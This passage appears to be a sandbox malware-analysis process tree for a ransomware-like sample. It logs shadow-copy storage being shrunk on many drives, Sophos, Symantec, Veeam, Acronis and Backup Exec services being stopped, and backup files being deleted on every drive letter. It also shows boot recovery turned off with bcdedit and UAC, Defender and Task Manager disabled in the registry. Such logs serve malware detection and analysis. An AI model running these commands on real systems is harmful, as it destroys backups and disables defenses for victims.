        Interacts with shadow copies
        
        PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    PID:1972
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
      4⤵
      PID:964
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2156
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SstpSvc"
        6⤵
        
        PID:932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    PID:932
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
      4⤵
      PID:2060
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    PID:1532
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
      4⤵
      PID:1740
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    PID:976
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
      4⤵
      PID:2108
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    PID:1180
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
      4⤵
      PID:1172
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    PID:1204
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
      4⤵
      PID:1352
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    PID:2028
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
      4⤵
      PID:2244
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    PID:776
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      4⤵
      PID:1592
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    PID:604
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
      4⤵
      PID:1364
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    PID:576
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
      4⤵
      PID:2116
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    PID:692
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
      4⤵
      PID:1756
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    PID:1624
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
      4⤵
      PID:760
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    PID:364
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
      4⤵
      PID:1628
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    PID:532
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
      4⤵
      PID:240
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    PID:1604
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
      4⤵
      PID:2100
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    PID:1480
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
      4⤵
      PID:1476
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    PID:1072
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
      4⤵
      PID:764
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    PID:1000
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      PID:2068
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
        5⤵
        Interacts with shadow copies
        
        PID:2472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
    3⤵
    PID:1640
  - - C:\Windows\system32\net.exe
      net stop " Enterprise Client Service"
      4⤵
      PID:2272
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop " Enterprise Client Service"
        5⤵
        
        PID:2284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
    3⤵
    PID:2304
  - - C:\Windows\system32\net.exe
      net stop "Sophos Agent"
      4⤵
      PID:2328
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Agent"
        5⤵
        
        PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
    3⤵
    PID:2392
  - - C:\Windows\system32\net.exe
      net stop "Sophos AutoUpdate Service"
      4⤵
      PID:2432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
        5⤵
        
        PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
    3⤵
    PID:2536
  - - C:\Windows\system32\net.exe
      net stop "Sophos Clean Service"
      4⤵
      PID:2548
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Clean Service"
        5⤵
        
        PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
    3⤵
    PID:2588
  - - C:\Windows\system32\net.exe
      net stop "Sophos Device Control Service"
      4⤵
      PID:2596
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Device Control Service"
        5⤵
        
        PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos File Scanner Service"
    3⤵
    PID:2640
  - - C:\Windows\system32\net.exe
      net stop "Sophos File Scanner Service"
      4⤵
      PID:2680
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos File Scanner Service"
        5⤵
        
        PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Health Service"
    3⤵
    PID:2716
  - - C:\Windows\system32\net.exe
      net stop "Sophos Health Service"
      4⤵
      PID:2736
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Health Service"
        5⤵
        
        PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Agent"
    3⤵
    PID:2812
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Agent"
      4⤵
      PID:2868
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Agent"
        5⤵
        
        PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos MCS Client"
    3⤵
    PID:2908
  - - C:\Windows\system32\net.exe
      net stop "Sophos MCS Client"
      4⤵
      PID:2924
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos MCS Client"
        5⤵
        
        PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Message Router"
    3⤵
    PID:2948
  - - C:\Windows\system32\net.exe
      net stop "Sophos Message Router"
      4⤵
      PID:2968
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Message Router"
        5⤵
        
        PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Safestore Service"
    3⤵
    PID:3000
  - - C:\Windows\system32\net.exe
      net stop "Sophos Safestore Service"
      4⤵
      PID:3020
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Safestore Service"
        5⤵
        
        PID:3040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos System Protection Service"
    3⤵
    PID:2436
  - - C:\Windows\system32\net.exe
      net stop "Sophos System Protection Service"
      4⤵
      PID:2540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos System Protection Service"
        5⤵
        
        PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Sophos Web Control Service"
    3⤵
    PID:2680
  - - C:\Windows\system32\net.exe
      net stop "Sophos Web Control Service"
      4⤵
      PID:2720
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Sophos Web Control Service"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING"
        5⤵
        
        PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Backup Service"
    3⤵
    PID:2896
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Backup Service"
      4⤵
      PID:2868
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Backup Service"
        5⤵
        
        PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLsafe Filter Service"
    3⤵
    PID:2924
  - - C:\Windows\system32\net.exe
      net stop "SQLsafe Filter Service"
      4⤵
      PID:2968
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLsafe Filter Service"
        5⤵
        
        PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Symantec System Recovery"
    3⤵
    PID:2536
  - - C:\Windows\system32\net.exe
      net stop "Symantec System Recovery"
      4⤵
      PID:2432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Symantec System Recovery"
        5⤵
        
        PID:1196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q L:\*.bac L:\*.bak L:\Backup*.* L:\backup*.*
    3⤵
    PID:2680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q K:\*.bac K:\*.bak K:\Backup*.* K:\backup*.*
    3⤵
    PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Q:\*.bac Q:\*.bak Q:\Backup*.* Q:\backup*.*
    3⤵
    PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q J:\*.bac J:\*.bak J:\Backup*.* J:\backup*.*
    3⤵
    PID:2908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q X:\*.bac X:\*.bak X:\Backup*.* X:\backup*.*
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q F:\*.bac F:\*.bak F:\Backup*.* F:\backup*.*
    3⤵
    PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Veeam Backup Catalog Data Service"
    3⤵
    PID:2184
  - - C:\Windows\system32\net.exe
      net stop "Veeam Backup Catalog Data Service"
      4⤵
      PID:2168
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service"
        5⤵
        
        PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q T:\*.bac T:\*.bak T:\Backup*.* T:\backup*.*
    3⤵
    PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q S:\*.bac S:\*.bak S:\Backup*.* S:\backup*.*
    3⤵
    PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q A:\*.bac A:\*.bak A:\Backup*.* A:\backup*.*
    3⤵
    PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Y:\*.bac Y:\*.bak Y:\Backup*.* Y:\backup*.*
    3⤵
    PID:2180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q V:\*.bac V:\*.bak V:\Backup*.* V:\backup*.*
    3⤵
    PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q P:\*.bac P:\*.bak P:\Backup*.* P:\backup*.*
    3⤵
    PID:2616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcronisAgent"
    3⤵
    PID:1560
  - - C:\Windows\system32\net.exe
      net stop "AcronisAgent"
      4⤵
      PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q Z:\*.bac Z:\*.bak Z:\Backup*.* Z:\backup*.*
    3⤵
    PID:2608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q R:\*.bac R:\*.bak R:\Backup*.* R:\backup*.*
    3⤵
    PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q W:\*.bac W:\*.bak W:\Backup*.* W:\backup*.*
    3⤵
    PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q B:\*.bac B:\*.bak B:\Backup*.* B:\backup*.*
    3⤵
    PID:2212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q M:\*.bac M:\*.bak M:\Backup*.* M:\backup*.*
    3⤵
    PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q G:\*.bac G:\*.bak G:\Backup*.* G:\backup*.*
    3⤵
    PID:1924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q N:\*.bac N:\*.bak N:\Backup*.* N:\backup*.*
    3⤵
    PID:1884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q O:\*.bac O:\*.bak O:\Backup*.* O:\backup*.*
    3⤵
    PID:1936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q E:\*.bac E:\*.bak E:\Backup*.* E:\backup*.*
    3⤵
    PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q I:\*.bac I:\*.bak I:\Backup*.* I:\backup*.*
    3⤵
    PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q H:\*.bac H:\*.bak H:\Backup*.* H:\backup*.*
    3⤵
    PID:1956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q U:\*.bac U:\*.bak U:\Backup*.* U:\backup*.*
    3⤵
    PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q D:\*.bac D:\*.bak D:\Backup*.* D:\backup*.*
    3⤵
    PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "AcrSch2Svc"
    3⤵
    PID:1204
  - - C:\Windows\system32\net.exe
      net stop "AcrSch2Svc"
      4⤵
      PID:2816
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "AcrSch2Svc"
        5⤵
        
        PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Antivirus"
    3⤵
    PID:908
  - - C:\Windows\system32\net.exe
      net stop "Antivirus"
      4⤵
      PID:1592
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Antivirus"
        5⤵
        
        PID:776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\Backup*.* C:\backup*.*
    3⤵
    PID:2436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentAccelerator"
    3⤵
    PID:1952
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentAccelerator"
      4⤵
      PID:2536
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentAccelerator"
        5⤵
        
        PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecAgentBrowser"
    3⤵
    PID:2260
  - - C:\Windows\system32\net.exe
      net stop "BackupExecAgentBrowser"
      4⤵
      PID:1876
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecAgentBrowser"
        5⤵
        
        PID:2912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
    3⤵
    PID:2340
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} recoveryenabled No
      4⤵
      PID:2220
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecDeviceMediaService"
    3⤵
    PID:1860
  - - C:\Windows\system32\net.exe
      net stop "BackupExecDeviceMediaService"
      4⤵
      PID:1112
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecDeviceMediaService"
        5⤵
        
        PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
    3⤵
    PID:2924
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
      4⤵
      PID:2232
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:2648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecJobEngine"
    3⤵
    PID:2660
  - - C:\Windows\system32\net.exe
      net stop "BackupExecJobEngine"
      4⤵
      PID:1072
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecJobEngine"
        5⤵
        
        PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:1008
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecManagementService"
    3⤵
    PID:2896
  - - C:\Windows\system32\net.exe
      net stop "BackupExecManagementService"
      4⤵
      PID:2264
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecManagementService"
        5⤵
        
        PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecRPCService"
    3⤵
    PID:1752
  - - C:\Windows\system32\net.exe
      net stop "BackupExecRPCService"
      4⤵
      PID:3044
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecRPCService"
        5⤵
        
        PID:1476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1160
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "BackupExecVSSProvider"
    3⤵
    PID:588
  - - C:\Windows\system32\net.exe
      net stop "BackupExecVSSProvider"
      4⤵
      PID:2196
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "BackupExecVSSProvider"
        5⤵
        
        PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2576
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:2572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "EPSecurityService"
    3⤵
    PID:2556
  - - C:\Windows\system32\net.exe
      net stop "EPSecurityService"
      4⤵
      PID:2448
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "EPSecurityService"
        5⤵
        
        PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:2080
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IISAdmin"
    3⤵
    PID:2620
  - - C:\Windows\system32\net.exe
      net stop "IISAdmin"
      4⤵
      PID:1532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IISAdmin"
        5⤵
        
        PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:1740
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
      4⤵
      PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1596
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
      4⤵
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "IMAP4Svc"
    3⤵
    PID:2808
  - - C:\Windows\system32\net.exe
      net stop "IMAP4Svc"
      4⤵
      PID:2696
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "IMAP4Svc"
